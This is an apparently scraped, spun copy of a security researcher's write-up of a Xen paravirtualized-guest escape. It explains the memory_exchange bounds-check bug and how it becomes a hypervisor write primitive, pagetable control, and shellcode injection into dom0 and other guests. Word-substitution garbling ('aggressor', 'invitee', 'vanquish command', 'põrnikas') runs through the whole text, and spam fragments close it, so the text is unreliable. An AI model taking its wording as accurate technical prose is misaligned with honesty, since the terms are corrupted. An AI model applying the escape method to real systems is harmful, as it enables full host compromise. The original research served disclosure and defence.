Pandavirtualization: Exploiting The Xen Hypervisor

Posted past times Jann Horn,

On 2017-03-14, I reported a bug to Xen's security squad that permits an aggressor alongside command over the nub of a paravirtualized x86-64 Xen invitee to intermission out of the hypervisor in addition to gain total command over the machine's physical memory. The Xen Project publicly released an advisory in addition to a patch for this number 2017-04-04.

To demonstrate the impact of the issue, I created an exploit that, when executed inwards ane 64-bit PV invitee alongside rootage privileges, volition execute a vanquish command equally rootage inwards all other 64-bit PV guests (including dom0) on the same physical machine.

Background

access_ok()

On x86-64, Xen PV guests part the virtual address infinite alongside the hypervisor. The coarse retentiveness layout looks equally follows:

Xen allows the invitee nub to perform hypercalls, which are essentially normal organization calls from the invitee nub to the hypervisor using the System V AMD64 ABI. They are performed using the syscall instruction, alongside upwards to 6 arguments passed inwards registers. Like normal syscalls, Xen hypercalls ofttimes accept invitee pointers equally arguments. Because the hypervisor shares its address space, it makes feel for guests to only transcend inwards guest-virtual pointers.

Like whatever kernel, Xen has to ensure that guest-virtual pointers don't truly dot to hypervisor-owned retentiveness earlier dereferencing them. It does this using userspace accessors that are similar to those inwards the Linux kernel; for example:

access_ok(addr, size) for checking whether a guest-supplied virtual retentiveness attain is security to access - inwards other words, it checks that accessing the retentiveness attain volition non modify hypervisor memory
__copy_to_guest(hnd, ptr, nr) for copying nr bytes from the hypervisor address ptr to the invitee address hnd without checking whether hnd is safe
copy_to_guest(hnd, ptr, nr) for copying nr bytes from the hypervisor address ptr to the invitee address hnd if hnd is safe

In the Linux kernel, the macro access_ok() checks whether the whole retentiveness attain from addr to addr+size-1 is security to access, using whatever retentiveness access pattern. However, Xen's access_ok() doesn't guarantee that much:

* Valid if inwards +ve one-half of 48-bit address space, or higher upwards Xen-reserved area.

* This is equally good valid for attain checks (addr, addr+size). As long equally the

* start address is exterior the Xen-reserved expanse in addition to so nosotros volition access a

* non-canonical address (and thus fault) earlier ever reaching VIRT_START.

#define __addr_ok(addr) \

(((unsigned long)(addr) < (1UL<<47)) || \

((unsigned long)(addr) >= HYPERVISOR_VIRT_END))

#define access_ok(addr, size) \

(__addr_ok(addr) || is_compat_arg_xlat_range(addr, size))

Xen commonly only checks that addr points into the userspace expanse or the nub expanse without checking size. If the actual invitee retentiveness access starts roughly at addr, proceeds linearly without skipping gigantic amounts of retentiveness in addition to bails out equally presently equally a invitee retentiveness access fails, only checking addr is sufficient because of the large attain of non-canonical addresses, which serve equally a large guard area. However, if a hypercall wants to access a invitee buffer starting at a 64-bit offset, it needs to ensure that the access_ok() banking concern check is performed using the right offset - checking the whole userspace buffer is unsafe!

Xen provides wrappers around access_ok() for accessing arrays inwards invitee memory. If you lot desire to banking concern check whether it's security to access an array starting at chemical cistron 0, you lot tin utilization guest_handle_okay(hnd, nr). However, if you lot desire to banking concern check whether it's security to access an array starting at a dissimilar element, you lot demand to utilization guest_handle_subrange_okay(hnd, first, last).

When I saw the Definition of access_ok(), the lack of security guarantees truly provided past times access_ok() seemed rather unintuitive to me, so I started searching for its callers, wondering whether anyone powerfulness live using it inwards an dangerous way.

Hypercall Preemption

When e.g. a scheduler tick happens, Xen needs to live able to speedily switch from the currently executing vCPU to some other VM's vCPU. However, only interrupting the execution of a hypercall won't move (e.g. because the hypercall could live belongings a spinlock), so Xen (like other operating systems) needs some machinery to delay the vCPU switch until it's security to practise so.

In Xen, hypercalls are preempted using voluntary preemption: Any long-running hypercall code is expected to regularly telephone yell upwards hypercall_preempt_check() to banking concern check whether the scheduler wants to schedule to some other vCPU. If this happens, the hypercall code exits to the guest, thereby signalling to the scheduler that it's security to preempt the currently-running task, after adjusting the hypercall arguments (in invitee registers or invitee memory) so that equally presently equally the electrical flow vCPU is scheduled again, it volition re-enter the hypercall in addition to perform the remaining work. Hypercalls don't distinguish betwixt normal hypercall entry in addition to hypercall re-entry after preemption.

This hypercall re-entry machinery is used inwards Xen because Xen does non receive got ane hypervisor stack per vCPU; it only has ane hypervisor stack per physical core. This agency that piece other operating systems (e.g. Linux) tin only leave of absence the land of an interrupted syscall on the nub stack, Xen can't practise that equally easily.

This blueprint agency that for some hypercalls, to permit them to properly resume their work, additional information is stored inwards invitee retentiveness that could potentially live manipulated past times the invitee to assail the hypervisor.

memory_exchange()

The hypercall HYPERVISOR_memory_op(XENMEM_exchange, arg) invokes the component subdivision memory_exchange(arg) inwards xen/common/memory.c. This component subdivision allows a invitee to "trade in" a listing of physical pages that are currently assigned to the invitee inwards telephone commutation for novel physical pages alongside dissimilar restrictions on their physical contiguity. This is useful for guests that desire to perform DMA because DMA requires physically contiguous buffers.

The hypercall takes a struct xen_memory_exchange equally argument, which is defined equally follows:

struct xen_memory_reservation {

/* [...] */

XEN_GUEST_HANDLE(xen_pfn_t) extent_start; /* in: physical page listing */

/* Number of extents, in addition to size/alignment of each (2^extent_order pages). */

xen_ulong_t nr_extents;

unsigned int extent_order;

/* XENMEMF flags. */

unsigned int mem_flags;

* Domain whose reservation is beingness changed.

* Unprivileged domains tin specify only DOMID_SELF.

domid_t domid;

};

struct xen_memory_exchange {

* [IN] Details of retentiveness extents to live exchanged (GMFN bases).

* Note that @in.address_bits is ignored in addition to unused.

struct xen_memory_reservation in;

* [IN/OUT] Details of novel retentiveness extents.

* We require that:

* 1. @in.domid == @out.domid

* 2. @in.nr_extents << @in.extent_order ==

* @out.nr_extents << @out.extent_order

* 3. @in.extent_start in addition to @out.extent_start lists must non overlap

* 4. @out.extent_start lists GPFN bases to live populated

* 5. @out.extent_start is overwritten alongside allocated GMFN bases

struct xen_memory_reservation out;

* [OUT] Number of input extents that were successfully exchanged:

* 1. The get-go @nr_exchanged input extents were successfully

* deallocated.

* 2. The corresponding get-go entries inwards the output extent listing correctly

* indicate the GMFNs that were successfully exchanged.

* 3. All other input in addition to output extents are untouched.

* 4. If non all input exents are exchanged in addition to so the render code of this

* command volition live non-zero.

* 5. THIS FIELD MUST BE INITIALISED TO ZERO BY THE CALLER!

xen_ulong_t nr_exchanged;

};

The fields that are relevant for the põrnikas are in.extent_start, in.nr_extents, out.extent_start, out.nr_extents in addition to nr_exchanged.

nr_exchanged is documented equally ever beingness initialized to zippo past times the invitee - this is because it is non only used to render a number value, but equally good for hypercall preemption. When memory_exchange() is preempted, it stores its progress inwards nr_exchanged, in addition to the side past times side execution of memory_exchange() uses the value of nr_exchanged to create upwards one's heed at which dot inwards the input arrays in.extent_start in addition to out.extent_start it should resume.

Originally, memory_exchange() did non banking concern check the userspace array pointers at all earlier accessing them alongside __copy_from_guest_offset() in addition to __copy_to_guest_offset(), which practise non perform whatever checks themselves - so past times supplying hypervisor pointers, it was possible to motility Xen to read from in addition to write to hypervisor retentiveness - a pretty severe bug. This was discovered inwards 2012 (XSA-29, CVE-2012-5513) in addition to fixed equally follows (https://xenbits.xen.org/xsa/xsa29-4.1.patch):

diff --git a/xen/common/memory.c b/xen/common/memory.c

index 4e7c234..59379d3 100644

--- a/xen/common/memory.c

+++ b/xen/common/memory.c

@@ -289,6 +289,13 @@ static long memory_exchange(XEN_GUEST_HANDLE(xen_memory_exchange_t) arg)

goto fail_early;

}

+ if ( !guest_handle_okay(exch.in.extent_start, exch.in.nr_extents) ||

+ !guest_handle_okay(exch.out.extent_start, exch.out.nr_extents) )

+ {

+ rc = -EFAULT;

+ goto fail_early;

+ }

/* Only privileged guests tin allocate multi-page contiguous extents. */

if ( !multipage_allocation_permitted(current->domain,

exch.in.extent_order) ||

The bug

As tin live seen inwards the next code snippet, the 64-bit resumption offset nr_exchanged, which tin live controlled past times the invitee because of Xen's hypercall resumption scheme, tin live used past times the invitee to lead an offset from out.extent_start at which the hypervisor should write:

static long memory_exchange(XEN_GUEST_HANDLE_PARAM(xen_memory_exchange_t) arg)

{

[...]

/* Various sanity checks. */

[...]

if ( !guest_handle_okay(exch.in.extent_start, exch.in.nr_extents) ||

!guest_handle_okay(exch.out.extent_start, exch.out.nr_extents) )

{

rc = -EFAULT;

goto fail_early;

}

[...]

for ( i = (exch.nr_exchanged >> in_chunk_order);

i < (exch.in.nr_extents >> in_chunk_order);

i++ )

{

[...]

/* Assign each output page to the domain. */

for ( j = 0; (page = page_list_remove_head(&out_chunk_list)); ++j )

{

[...]

if ( !paging_mode_translate(d) )

{

[...]

if ( __copy_to_guest_offset(exch.out.extent_start,

(i << out_chunk_order) + j,

&mfn, 1) )

rc = -EFAULT;

}

[...]

}

[...]

}

However, the guest_handle_okay() banking concern check only checks whether it would live security to access the invitee array exch.out.extent_start starting at offset 0; guest_handle_subrange_okay() would receive got been correct. This agency that an aggressor tin write an 8-byte value to an arbitrary address inwards hypervisor retentiveness past times choosing:

exch.in.extent_order in addition to exch.out.extent_order equally 0 (exchanging page-sized blocks of physical retentiveness for novel page-sized blocks)

exch.out.extent_start in addition to exch.nr_exchanged so that exch.out.extent_start points to userspace retentiveness piece exch.out.extent_start+8*exch.nr_exchanged points to the target address inwards hypervisor memory, alongside exch.out.extent_start closed to NULL; this tin live calculated equally exch.out.extent_start=target_addr%8, exch.nr_exchanged=target_addr/8.
exch.in.nr_extents in addition to exch.out.nr_extents equally exch.nr_exchanged+1
exch.in.extent_start equally input_buffer-8*exch.nr_exchanged (where input_buffer is a legitimate invitee nub pointer to a physical page number that is currently owned past times the guest). This is guaranteed to ever dot to the invitee userspace attain (and thus transcend the access_ok() check) because exch.out.extent_start roughly points to the start of the userspace address attain in addition to the hypervisor in addition to invitee nub address ranges together are only equally large equally the userspace address range.

The value that is written to the attacker-controlled address is a physical page number (physical address divided past times the page size).

Exploiting the bug: Gaining pagetable control

Especially on a busy system, controlling the page numbers that are written past times the nub powerfulness live difficult. Therefore, for reliable exploitation, it makes feel to care for the põrnikas equally a primitive that permits repeatedly writing 8-byte values at controlled addresses, alongside the nearly pregnant bits beingness zeroes (because of the express amount of physical memory) in addition to the to the lowest degree pregnant bits beingness to a greater extent than or less random. For my exploit, I decided to care for this primitive equally ane that writes an essentially random byte followed past times 7 bytes of garbage.

It turns out that for an x86-64 PV guest, such a primitive is sufficient for reliably exploiting the hypervisor for the next reasons:

x86-64 PV guests know the existent physical page numbers of all pages they tin access
x86-64 PV guests tin map alive pagetables (from all iv paging levels) belonging to their domain equally readonly; Xen only prevents mapping them equally writable
Xen maps all physical retentiveness equally writable at 0xffff830000000000 (in other words, the hypervisor tin write to whatever physical page, independent of the protections using which it is mapped inwards other places, past times writing to physical_address+0xffff830000000000).

The finish of the assail is to dot an entry inwards a alive marking three pagetable (which I'll telephone yell upwards "victim pagetable") to a page to which the invitee has write access (which I'll telephone yell upwards "fake pagetable"). This agency that the aggressor has to write an 8-byte value, containing the physical page number of the imitation pagetable in addition to some flags, into an entry inwards the victim pagetable, in addition to ensure that the next 8-byte pagetable entry stays disabled (e.g. past times setting the get-go byte of the next entry to zero). Essentially, the aggressor has to write nine controlled bytes followed past times 7 bytes that don't matter.

Because the physical page numbers of all relevant pages in addition to the address of the writable mapping of all physical retentiveness are known to the guest, figuring out where to write in addition to what value to write is easy, so the only remaining work is how to utilization the primitive to truly write data.

Because the aggressor wants to utilization the primitive to write to a readable page, the "write ane random byte followed past times 7 bytes of garbage" primitive tin easily live converted to a "write ane controlled byte followed past times 7 bytes of garbage" primitive past times repeatedly writing a random byte in addition to reading it dorsum until the value is right. Then, the "write ane controlled byte followed past times 7 bytes of garbage" primitive tin live converted to a "write controlled information followed past times 7 bytes of garbage" primitive past times writing bytes to consecutive addresses - in addition to that's just the primitive needed for the attack.

At this point, the aggressor tin command a alive pagetable, which allows the aggressor to map arbitrary physical retentiveness into the guest's virtual address space. This agency that the aggressor tin reliably read from in addition to write to the memory, both code in addition to data, of the hypervisor in addition to all other VMs on the system.

Running vanquish commands inwards other VMs

At this point, the aggressor has total command over the machine, equivalent to the privilege marking of the hypervisor, in addition to tin easily steal secrets past times searching through physical memory; in addition to a realistic aggressor likely wouldn't desire to inject code into VMs, considering how much to a greater extent than detectable that makes an attack.

But running an arbitrary vanquish command inwards other VMs makes the severity to a greater extent than obvious (and it looks cooler), so for fun, I decided to kicking the bucket on my exploit so that it injects a vanquish command into all other 64-bit PV domains.

As a get-go step, I wanted to reliably gain code execution inwards hypervisor context. Given the powerfulness to read in addition to write physical memory, ane relatively OS- (or hypervisor-)independent way to telephone yell upwards an arbitrary address alongside kernel/hypervisor privileges is to locate the Interrupt Descriptor Table using the unprivileged SIDT instruction, write an IDT entry alongside DPL three in addition to heighten the interrupt. (Intel's upcoming Cannon Lake CPUs are patch going to back upwards User-Mode Instruction Prevention (UMIP), which volition finally brand SIDT a privileged instruction.) Xen supports SMEP in addition to SMAP, so it isn't possible to just dot the IDT entry at invitee memory, but using the powerfulness to write pagetable entries, it is possible to map a guest-owned page alongside hypervisor-context shellcode equally non-user-accessible, which allows it to run despite SMEP.

Then, inwards hypervisor context, it is possible to claw the syscall entry dot past times reading in addition to writing the IA32_LSTAR MSR. The syscall entry dot is used both for syscalls from invitee userspace in addition to for hypercalls from invitee kernels. By mapping an attacker-controlled page into guest-user-accessible memory, changing the register land in addition to invoking sysret, it is possible to divert the execution of invitee userspace code to arbitrary invitee user shellcode, independent of the hypervisor or the invitee operating system.

My exploit injects shellcode into all invitee userspace processes that is invoked on every write() syscall. Whenever the shellcode runs, it checks whether it is running alongside rootage privileges in addition to whether a lockfile doesn't be inwards the guest's filesystem yet. If these weather condition are fulfilled, it uses the clone() syscall to create a shaver procedure that runs an arbitrary vanquish command.

(Note: My exploit doesn't construct clean upwards after itself on purpose, so when the attacking domain is closed downward later, the hooked entry dot volition speedily motility the hypervisor to crash.)

Here is a screenshot of a successful assail against Qubes OS 3.2, which uses Xen equally its hypervisor. The exploit is executed inwards the unprivileged domain "test124"; the screenshot shows that it injects code into dom0 in addition to the firewallvm:

Conclusion

I believe that the rootage motility of this number were the weak security guarantees made past times access_ok(). The electrical flow version of access_ok() was committed inwards 2005, 2 years after the get-go populace liberate of Xen in addition to long earlier the get-go XSA was released. It seems similar sometime code tends to comprise relatively straightforward weaknesses to a greater extent than ofttimes than newer code because it was committed alongside less scrutiny regarding security issues, in addition to such sometime code is in addition to so ofttimes left alone.

When security-relevant code is optimized based on assumptions, help must live taken to reliably preclude those assumptions from beingness violated. access_ok() truly used to banking concern check whether the whole attain overlaps hypervisor memory, which would receive got prevented this põrnikas from occurring. Unfortunately, inwards 2005, a commit alongside "x86_64 fixes/cleanups" was made that changed the behaviour of access_ok() on x86_64 to the electrical flow one. As far equally I tin tell, the only argue this didn't straightaway brand the MEMOP_increase_reservation in addition to MEMOP_decrease_reservation hypercalls vulnerable is that the nr_extents declaration of do_dom_mem_op() was only 32 bits broad - a relatively brittle defense.

While at that topographic point receive got been several Xen vulnerabilities that only affected PV guests because the issues were inwards code that is unnecessary when dealing alongside HVM guests, I believe that this isn't ane of them. Accessing invitee virtual retentiveness is much to a greater extent than straightforward for PV guests than for HVM guests: For PV guests, raw_copy_from_guest() calls copy_from_user(), which basically just does a bounds banking concern check followed past times a memcpy alongside pagefault fixup - the same thing normal operating organization kernels practise when accessing userspace memory. For HVM guests, raw_copy_from_guest() calls copy_from_user_hvm(), which has to practise a page-wise re-create (because the retentiveness expanse powerfulness live physically non-contiguous in addition to the hypervisor doesn't receive got a contiguous virtual mapping of it) alongside invitee pagetable walks (to interpret invitee virtual addresses to invitee physical addresses) in addition to invitee frame lookups for every page, including reference counting, mapping invitee pages into hypervisor retentiveness in addition to diverse checks to e.g. preclude HVM guests from writing to readonly grant mappings. So for HVM, the complexity of treatment invitee retentiveness accesses is truly higher than for PV.

For security researchers, I cry back that a lesson from this is that paravirtualization is non much harder to sympathize than normal kernels. If you've audited nub code before, the hypercall entry path (lstar_enter in addition to int80_direct_trap inwards xen/arch/x86/x86_64/entry.S) in addition to the basic blueprint of hypercall handlers (for x86 PV: listed inwards the pv_hypercall_table inwards xen/arch/x86/pv/hypercall.c) should aspect to a greater extent than or less similar normal syscalls.

plantillasnowcrystalsdelui

Cari Blog Ini